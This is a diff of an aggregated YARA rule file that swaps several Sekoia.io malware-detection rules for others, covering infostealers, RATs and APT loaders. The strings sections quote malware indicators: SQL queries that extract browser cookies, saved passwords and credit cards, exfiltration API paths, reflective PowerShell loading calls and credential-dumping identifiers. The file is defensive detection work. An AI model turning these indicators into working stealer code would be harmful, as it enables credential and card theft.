 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "94edfd0606816ff01d1345357a852cab4321d8881921e51ba96d8d2d4cb893b5"
+		logic_hash = "fc7c11a9ddd21228aa773da6054220211327727a87d48008b7edb202c48666d8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243571,113 +243428,128 @@ rule SEKOIA_Infostealer_Win_Spacestealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "spacestealerxD" ascii
-		$str02 = "\\spacex" ascii
-		$str03 = "@~$~@spacex-" ascii
-		$str04 = "StealerClient" ascii
-		$str05 = "kill-process-by-name" ascii
-		$str06 = "\\BetterDiscord\\data\\betterdiscord.asar" ascii
-		$str07 = "api/webhooks" ascii
-		$str08 = "discordPath" ascii
-		$str09 = "SELECT host_key, name, encrypted_value FROM cookies" ascii
-		$str10 = "SELECT origin_url, username_value, password_value FROM logins" ascii
-		$str11 = "SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards" ascii
-		$str12 = "Cookies don't found." ascii
-		$str13 = "/api/cookies?auth=" ascii
-		$str14 = "/api/passwords?auth=" ascii
-		$str15 = "/api/autofill?auth=" ascii
-		$str16 = "/api/creditcards?auth=" ascii
-		$str17 = "\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\Network\\" ascii
+		$cha01 = "@top\\LOGGERS\\DARKCLOUD" wide
+		$cha02 = "===============DARKCLOUD===============" wide
+		$cha03 = "#######################################DARKCLOUD#######################################" wide
+		$cha04 = "fireballsabadafirebricksfisherboat" ascii
+		$cha05 = "Moonchild Pro2ductions" wide
+		$str01 = "\\Microsoft\\Windows\\Templates\\credentials.txt" wide
+		$str02 = "\\NETGATE Technologies\\BlackHawK\\Profiles" wide
+		$str03 = "SysWOW64\\winsqlite3.dll" wide
+		$str04 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*RD_" wide
+		$str05 = "Expiry Date;" wide
+		$str06 = "SELECT c0subject, c3author, c4recipients, c1body  FROM messagesText_content" wide
+		$str07 = "http://www.mediacollege.com/internet/utilities/show-ip.shtml" wide
+		$str08 = "\\163MailContacts.txt" wide
+		$key_0 = {ba ?? ?? 40 00 8d 4?}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 10MB and 13 of them
+		uint16( 0 ) == 0x5A4D and 2 of ( $cha* ) and 4 of ( $str* ) and $key_0
 }
-rule SEKOIA_Keylogger_Win_Donot
+rule SEKOIA_Tool_Win_Gosecretsdump : FILE
 {
 	meta:
-		description = "Detect the DoNot's keylogger malware"
+		description = "Finds gosecretsdump EXE based on strings"
 		author = "Sekoia.io"
-		id = "4f67dda7-da68-4496-a8b4-a8a769ddd763"
-		date = "2023-03-20"
+		id = "9225fe95-e37c-48ff-b5b5-680f255349bd"
+		date = "2024-06-10"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/keylogger_win_donot.yar#L1-L16"
+		reference = "https://github.com/C-Sto/gosecretsdump/releases"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_gosecretsdump.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "eb935f84335e934346511b4108f70df469deef6ecaaba809c144197c04a28f64"
+		logic_hash = "957b0deae745e4fda5a790acc391cebf9d193efb2a19ad5eb18c54da8c17bcfa"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "iwrct2mTFAu0ew1nyqQgoaNtNo0+52R0XiTKbwy1W48Bn1b2YcNt0+tptyY6oGoAeLDGekM/yHcdikNGi8bLqkUQ8CIdkWeT3QiympOTfjs="
-		$ = "ZmVwZW9kbWZ2c24ucHMuZ3h4LngweXBvdWpkYm1qcXE7YnFmVXp1LmZvb3VEcA=="
+		$str01 = "github.com/C-Sto/gosecretsdump" ascii
+		$str02 = "/pkg/esent" ascii
+		$str03 = "/pkg/ditreader" ascii
+		$str04 = "/pkg/samreader" ascii
+		$str05 = "ntdsFileLocation" ascii
+		$str06 = "NTDSLoc" ascii
+		$str07 = "SAMEntries" ascii
+		$str08 = "SAMHashAES" ascii
+		$str09 = "NTLMHash" ascii
+		$str10 = "HasNoLMHashPolicy" ascii
+		$str11 = "PreviousIncBackup" ascii
+		$str12 = "Esent_record" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5A4D and 7 of them
 }
-
-rule SEKOIA_Downloader_Win_Apt33_Tickler : FILE
+rule SEKOIA_Win_Infostealer_Serpent_Strings : FILE
 {
 	meta:
-		description = "Detect the downloader used by APT33 to diwnload Tickler"
+		description = "Serpent Stealer string"
 		author = "Sekoia.io"
-		id = "e1f704d6-d527-479a-8311-d286c06768ac"
-		date = "2024-08-29"
+		id = "ad9e2366-c95e-4090-a0db-48f3cc325209"
+		date = "2023-12-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_apt33_tickler.yar#L4-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_infostealer_serpent_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e6fff291b73812e5a999fbc566e8f7181dcdf01b849a9664ba05fe0a2bc982fe"
+		logic_hash = "5266d1c8228f02e8ac9da5ddd8b968fde0d0e83afa408d405ec4ca50c3453928"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$s1 = "User Has SSH Dir." wide
+		$s2 = "[+] Executing Wallets" wide
+		$s3 = "'serpent' folder" wide
+		$s4 = "Buddy Kys!!!" wide
+		$s5 = "http://checkip.dyndns.org/" wide
+		$s6 = "[+] Target has discord installed" wide
+		$s7 = "Target has minecraft." wide
+
 	condition:
-		uint16be( 0 ) == 0x4d5a and pe.imphash ( ) == "e43c58659b5b3082387307603478881a" or hash.md5 ( pe.rich_signature.clear_data ) == "d30bd7875b225709ecf95bf68dbd435f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d7d2079d0a656c06a03f2c277bb08bda" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "61a1425e6a0d28e29c6fd3d451ac3717" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "916bf96ed3274ce8322d9f370432844f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3fab9d4ae989d53cecb2f443b8ce88d0" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e0967483e074da72ceff4dea3bc17530" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "b4a571736b6646765155ffbd57c27c83" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "35c88ba521887f8fe1b2501f8cd8bd98" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "636dc666c7496cb3382b029fed53473f181cdc24405886c468e51a103d78b4d4" )
+		( uint16be( 0 ) == 0x4d5a ) and filesize < 100KB and 5 of them
 }
-rule SEKOIA_Tool_Tacticalrmm_Installer_Strings : FILE
+rule SEKOIA_Apt_Cloudatlas_Powertunnel_Loader
 {
 	meta:
-		description = "Detects TacticalRMM installer"
+		description = "Detects the Powershell loader of the PowerTunnel dll"
 		author = "Sekoia.io"
-		id = "c4a0ba33-b458-4c2a-abfa-4c33481d6491"
-		date = "2024-05-23"
+		id = "f2333b8a-99e9-4f28-b0d8-4f7dc4c648c5"
+		date = "2022-11-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_tacticalrmm_installer_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powertunnel_loader.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0f8d66eb1c9c6ed9571a1dd7de05072aec6d3cda874618889d4fd51e5965bb26"
+		logic_hash = "742374ad22d9333ef071fe95058f28ae00325cca833b557481ef5d453b3a4977"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 55
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "TacticalRMMInstaller" ascii
-		$ = "tacticalagent-" ascii
-		$ = "tactical/go" ascii
-		$ = "tacticalrmm." ascii
+		$ = "New-Object System.IO.Compression.GzipStream(" ascii fullword
+		$ = "[System.Reflection.Assembly]::Load("
+		$ = ".ReadBytes("
+		$ = ".Service]::StartMain"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 3MB and filesize < 8MB and 3 of them
+		uint8be( 0 ) == 0x24 and all of them
 }
-rule SEKOIA_Tool_Cheat_Engine : FILE
+rule SEKOIA_Apt_Badmagic_Commonmagic_Generic_2 : FILE
 {
 	meta:
-		description = "Detects Cheat Engine driver"
+		description = "Detects CommonMagic related implants"
 		author = "Sekoia.io"
-		id = "51d4246c-f7a1-4589-8f97-bd85d1fe4a0e"
-		date = "2024-07-22"
+		id = "c6a16ecc-e00a-4756-b603-f6c85e4f4220"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_cheat_engine.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_commonmagic_generic_2.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "2a70016be13c4eff7f7381fd0e34c345c95f09d4cd8b754ea68d59adfe3fe4b6"
+		logic_hash = "d3916ab749ae5b6e0a8abdc9641de13e0328809a6e20c6ce04ada5dbfb742689"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243685,131 +243557,129 @@ rule SEKOIA_Tool_Cheat_Engine : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "ObOpenObjectByName" wide
-		$s2 = "PsGetProcessImageFileName" wide
-		$s3 = "PsRemoveCreateThreadNotifyRoutine" wide
-		$s4 = "PsSuspendProcess" wide
-		$s5 = "PsResumeProcess" wide
-		$s6 = "\\device\\physicalmemory" wide
-		$log = "%sCPU%d.trace" wide
-		$ioctl_code = {04 E1 22 00}
+		$ = "\\CommonCommand\\" ascii wide
+		$ = "\\\\.\\pipe\\PipeMd" ascii wide fullword
+		$ = "\\\\.\\pipe\\PipeDtMd" ascii wide fullword
+		$ = "\\\\.\\pipe\\PipeCrDtMd" ascii wide fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 2 of them
 }
-rule SEKOIA_Bot_Lin_Kinsing_Strings : FILE
+rule SEKOIA_Apt_Lazarus_Blindingcan_Rtti
 {
 	meta:
-		description = "Catch Kinsing malware based on strings"
+		description = "Detects BLINDINGCAN with RTTI"
 		author = "Sekoia.io"
-		id = "ce41b6d0-bc22-4a85-a3bb-ed3234871524"
-		date = "2023-11-24"
+		id = "9a16c189-ffc1-4aa6-8582-298abaecd0ef"
+		date = "2022-10-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_lin_kinsing_strings.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_blindingcan_rtti.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "164b22734541d43047a2ea868cf0a269efe69c64a6392030168f4d391b1be777"
+		logic_hash = "fbec1f9a180782bf330d86facbada9af018741897c58f4ab6e0b52a1b38ae966"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "MinerUrl" ascii
-		$s2 = "main.masscan" ascii
-		$s3 = "redisBrute" ascii
-		$s4 = "ActiveC2CUrl" ascii
-		$s5 = "main.getKi" ascii
-		$s6 = "main.getMu" ascii
-		$s7 = "tryToRunMiner" ascii
-		$s8 = "main.kiLoader" ascii
-		$s9 = "main.downloadAndExecute" ascii
+		$s1 = ".?AVCHTTP_Protocol@@" ascii wide fullword
+		$s2 = ".?AVCFileRW@@" ascii wide fullword
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		all of them
 }
-rule SEKOIA_Apt_Unk_Dex_China_Freedom_Trap_Spyware : FILE
+rule SEKOIA_Backdoor_Win_Rokrat : FILE
 {
 	meta:
-		description = "Detects China Freedom Trap spyware dex file"
+		description = "Detect the RokRAT malware"
 		author = "Sekoia.io"
-		id = "3d66b6b8-8397-441a-a337-4a282df39591"
-		date = "2022-09-07"
+		id = "97a3acc1-4120-4d67-a6ad-fa204f2fd7f5"
+		date = "2023-07-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unk_dex_china_freedom_trap_spyware.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_rokrat.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "ceb70fce74898ea64ded6880a978441c"
-		logic_hash = "f85f78a1a58fa8b2698637f8c540877ea1c5141ff7f74e8c2f2755f5aba5a599"
+		logic_hash = "42e0b8583570d32a5d6a5bed175a53951e7d68d8471a283ef245686621dc01c4"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "84760cac26513915ebfb0a80ad3ddabe62f03ec4fda227d63e764f9c4a118c4e"
+		hash2 = "758348521331bb18241d1cfc90d7e687dbc5bad8d596a2b2d6a9deb6cfc8cb1d"
+		hash3 = "2a253c2aa1db3f809c86f410e4bd21f680b7235d951567f24d614d8e4d041576"
+		hash4 = "ebce34cdeb20bc8c75249ce87a3080054f48b03ef66572fbc9dc40e6c36310d6"
+		hash5 = "a1e4e95a20120f16adacb342672eec1e73bd7826b332096f046bb7e2b7cd80a1"
+		hash6 = "3be58a7a7a25dbceee9e7ef06ef20aa86aef083be19db9e5ffb181d3f9f6615a"
+		hash7 = "fa4df84071b9ae20b321e4d22162d8480f6992206bc046e403c2fbedd1655503"
+		hash8 = "aa76b4db29cf929b4b22457ccb8cd77308191f091cde2f69e578ade9708d7949"
 
 	strings:
-		$ = "INSTALL" base64
-		$ = "FAILED" base64
-		$ = "TEST" base64
-		$ = "ONLY" base64
-		$ = "INSTALL" base64
-		$ = "INCONSISTENT" base64
-		$ = "CERTIFICATES" base64
-		$ = "Network country iso:" base64
-		$ = "Network operator name:" base64
-		$ = "SIM operator name:" base64
-		$ = "SIM country iso:" base64
-		$ = "SIM state:" base64
-		$ = "PIN REQUIRED" base64
-		$ = "PUK REQUIRED" base64
+		$ = "--wwjaughalvncjwiajs--"
+		$ = {7b 00 22 00 70 00 61 00 74 00 68 00 22 00 3a 00 22 00 25 00 73 00 22 00 2c 00 22 00 6d 00 6f 00 64 00 65 00 22 00 3a 00 7b 00 22 00 2e 00 74 00 61 00 67 00 22 00 3a 00 22 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 22 00 7d 00 7d}
+		$ = {68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 6c 00 6f 00 75 00 64 00 2d 00 61 00 70 00 69 00 2e 00 79 00 61 00 6e 00 64 00 65 00 78 00 2e 00 6e 00 65 00 74 00 2f 00 76 00 31 00 2f 00 64 00 69 00 73 00 6b 00 2f 00 72 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 73 00 2f 00 75 00 70 00 6c 00 6f 00 61 00 64 00 3f 00 70 00 61 00 74 00 68 00 3d 00 25 00 73 00 26 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 3d 00 25 00 73}
 
 	condition:
-		uint32be( 0 ) == 0x6465780A and filesize < 100KB and 4 of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-
-rule SEKOIA_Apt_Mustangpanda_Maliciousdll_Loading_Plugx_Strings
+rule SEKOIA_Trojan_Win_Bbtok_Lnk_Sep23 : FILE
 {
 	meta:
-		description = "Detects MustangPanda malicious DLL"
+		description = "Finds BBTok installation LNK file"
 		author = "Sekoia.io"
-		id = "2296ac6e-63f5-4cff-aeb7-2c5205e6f559"
-		date = "2023-12-18"
+		id = "b1d5dae6-d92f-4a4a-ae90-528cdb3e9e4c"
+		date = "2023-09-26"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_maliciousdll_loading_plugx_strings.yar#L3-L23"
+		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_win_bbtok_lnk_sep23.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "651c096cf7043a01d939dff9ba58e4d69f15b2244c71b43bedb4ada8c37e8859"
-		logic_hash = "667901d36585248a891b90ff8ed7006030151fbbbe0d4a85570944a94edba7f8"
+		hash = "32bf07e3740399105359b62d8a612dfa731b024e06c9104b71b496919b5efe9e"
+		logic_hash = "5783487585dde1314c485bdcf3942b7e8b572c0689522ea136240833d2a64f5b"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "VirtualAlloc"
-		$ = "VirtualFree"
-		$ = "VirtualProtect"
-		$ = "VirtualQuery"
-		$ = "GCC: (MinGW-W64"
+		$lnk = {4C 00 00 00}
+		$str01 = "%ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge.exe" ascii wide
+		$str02 = ".pdf /Y & start" wide
+		$str03 = "\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe -nologo" wide
 
 	condition:
-		pe.exports( "MsiProvideQualifiedComponentW" ) and all of them
+		all of them and filesize < 10KB
 }
-
-rule SEKOIA_Hacktool_Win_Gmer : FILE
+rule SEKOIA_Apt_Yemen_Apk_Guardzoo : FILE
 {
 	meta:
-		description = "Dtect the GMER hacktool based string and UPX usage"
+		description = "Detects Dex files containing GuardZoo strings."
 		author = "Sekoia.io"
-		id = "d2f1aba1-4222-45e5-95bd-4d7f08595cea"
-		date = "2022-09-09"
+		id = "f4004e7c-2904-46ea-a3e6-2bdd3e704fea"
+		date = "2024-08-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_win_gmer.yar#L3-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_yemen_apk_guardzoo.yar#L1-L40"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "dbd4e97c343dcb14c6e814afa820a9fbb5aa4290c7ddf9d864029bb35bb96dbf"
+		hash = "3afad114c68489e2d294720339baf570"
+		hash = "c59d0f5c8d00485199f147b96c5abca0"
+		hash = "75c58948725133160085dc1cfdf602ec"
+		hash = "d76a39ee85263900f7e6eaacb804f5e2"
+		hash = "51356c95dfe1221c0f4ca2475bc787f8"
+		hash = "1d0dd8201c051d9c8d2c945c8b31a48c"
+		hash = "b7b6be5e8eec44dd13e1df1f3908fcf0"
+		hash = "229984f004578a8fa643afb881d81e8c"
+		hash = "f3f1ccb3912c49a0a6ea710a0bd856de"
+		hash = "a3f8365bfa5f8185e8c7eba8efc63165"
+		hash = "7392deaf81ddf50b8a6f2179538f7e81"
+		hash = "c40d56e1586f9fa382c688d624d25525"
+		hash = "629fb04b91c4db4ea282440e20317dab"
+		hash = "bcebc41628196f8bd119f72e1e8eb47c"
+		hash = "f1cfdc9e91c3a20563246cf366b94f10"
+		hash = "a75ffb11adbace40a7c59128adba43ad"
+		logic_hash = "7d98aefa4c2ee7316e0ff47a67d9f19913852d1a451ef38ccb77709394e4ba73"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243817,25 +243687,31 @@ rule SEKOIA_Hacktool_Win_Gmer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$pac = "IDI_GMER" wide
-		$str0 = "---- Processes - GMER %s ----" ascii
-		$str1 = "E:\\projects\\cpp\\gmer\\Release\\gmer.pdb" ascii
+		$classes_1 = "GuardZoo.java"
+		$classes_2 = "com/animals"
+		$path_1 = "&Password="
+		$path_2 = "&Coordinates="
+		$path_3 = "&Data="
+		$path_4 = "&Device="
+		$path_5 = "&ISPICTURE="
+		$path_6 = "&Phone_Number="
+		$path_7 = "&Provider="
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $pac and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == "UPX0" ) ) or any of ( $str* ) ) and filesize < 900KB
+		uint32be( 0 ) == 0x6465780a and filesize < 10MB and ( ( any of ( $classes_* ) ) and ( 3 of ( $path_* ) ) )
 }
-rule SEKOIA_Apt_Badmagic_Installpzz_Pshscript : FILE
+rule SEKOIA_Strongpity_Malware : FILE
 {
 	meta:
-		description = "Detects BadMagic InstallPZZ powershell script"
+		description = "Detects obfuscation used by StrongPity"
 		author = "Sekoia.io"
-		id = "d01bc217-9e14-498b-a92a-17f6aedec269"
-		date = "2023-05-15"
+		id = "f19a685c-599d-42cf-a5d8-7a2375102f97"
+		date = "2024-02-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_installpzz_pshscript.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/strongpity_malware.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "58256cffd1d5060769f304393c22b6488abe9515eb7df2a967ba2fed85a9ec9a"
+		logic_hash = "14be5eccb4e754d6dad69cda51a924241cc75f5d758bc2d746acfe41e1684b3a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243843,50 +243719,51 @@ rule SEKOIA_Apt_Badmagic_Installpzz_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "start-job -ScriptBlock $script;"
-		$ = "Start-Sleep -Second 1;"
-		$ = "Write-Output \"$url$j"
-		$ = "Start-Sleep -Second 2;"
+		$rand_edi = {E8 ?? ?? ?? ??    8B F8 81 E7 07 00 00 80    79 ?? 4F 83 CF F8 47 83 C7 02}
+		$rand_esi = {E8 ?? ?? ?? ?? 8B F0 81 E6 07 00 00 80 79 ?? 4E 83 CE F8 46 83 C6 02}
+		$rand_eax = {E8 ?? ?? ?? ??    25 07 00 00 80 79 ?? 48 83 C8 F8 40 83 C0 02}
 
 	condition:
-		all of them and filesize < 1KB
+		uint16be( 0 ) == 0x4d5a and #rand_edi + #rand_esi + #rand_eax > 20
 }
-rule SEKOIA_Launcher_Win_Romcom_Launcher : FILE
+rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc_Vba : FILE
 {
 	meta:
-		description = "Detect the launcher of RomCom malware"
+		description = "Detects some suspected APT28 document vba"
 		author = "Sekoia.io"
-		id = "e8fa8239-a763-4be2-8f34-8e112e65b35e"
-		date = "2022-11-04"
+		id = "58040dbd-09ae-4f9e-940d-3a522e7ccfbb"
+		date = "2024-07-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/launcher_win_romcom_launcher.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_apt28_uac0063_malicious_doc_vba.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7d94f187c3fb85cbfe961dd3b292dc1abd36a8cee7c9ff9ec08c4c1e23d38588"
-		score = 75
-		quality = 78
+		hash = "fceffb8ae94cef3af21b2943131e94db9e0e67073de48d9d32601a245448d067"
+		logic_hash = "c57676b765364c5c51d2bf231b5fe858129b45ba837ec6554b353177bb16bd8a"
+		score = 65
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {43 3a 5c 55 73 65 72 73 5c 31 32 33 5c 73 6f 75 72 63 65 5c 72 65 70 6f 73 5c 69 6e 73 5f 61 73 69 5c 57 69 6e 33 32 5c 52 65 6c 65 61 73 65 5c 73 65 74 75 70 2e 70 64 62}
+		$ = { 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 30 }
+		$ = "ThisDocument" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint32be( 0 ) == 0xd0cf11e0 and all of them
 }
-rule SEKOIA_Loader_Win_Aresloader : FILE
+rule SEKOIA_Malware_Valleyrat_1Ststage_Strings : FILE
 {
 	meta:
-		description = "Finds AresLoader samples based on characteristic strings"
+		description = "Detects ValleyRat 1stage"
 		author = "Sekoia.io"
-		id = "bf5070fc-c8ca-4458-8702-cd1830667b7a"
-		date = "2023-05-02"
+		id = "6628ba47-37ad-4bdb-bbc0-7286d777000e"
+		date = "2024-06-11"
 		modified = "2024-12-19"
-		reference = "https://blog.cyble.com/2023/04/28/citrix-users-at-risk-aresloader-spreading-through-disguised-gitlab-repo/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_aresloader.yar#L1-L28"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_valleyrat_1ststage_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "2edbb625394506e865580373d5c3454b4fa201183c84d247b4373f24e25f5fd4"
+		logic_hash = "78c45b8bd9241646512483d179d48b0e42e97fa1c18d6afd1af4423f7b7ce3c6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243894,90 +243771,49 @@ rule SEKOIA_Loader_Win_Aresloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "{\\\"ip\\\": '%s', \\\"UID\\\": '%s', \\\"geo\\\": '%s', \\\"service\\\": '%s', \\\"owner_token\\\": '%s'}" ascii
-		$str02 = "AresLdr_v_3" ascii
-		$str03 = "https://ipinfo.io/ip" ascii
-		$str04 = "C:\\Users\\%s\\AppData\\Roaming\\%s\\%s" ascii
-		$str05 = "/manager/payload" ascii
-		$str06 = "/manager/loader" ascii
-		$str07 = "/manager/legit" ascii
-		$str08 = "/manager/hvnc" ascii
-		$str09 = "C%p %d V=%0X w=%ld %s" ascii
-		$str10 = "rundll32.exe %s,%s" ascii
-		$str11 = "%startinfo" ascii
-		$str12 = "%managedapp" ascii
-		$str13 = "%has_cctor" ascii
+		$ = "%016llX.DLL" wide
+		$ = "%s\\%s" wide
+		$ = "%016llX\\%s" wide
+		$ = "connection already in progress"
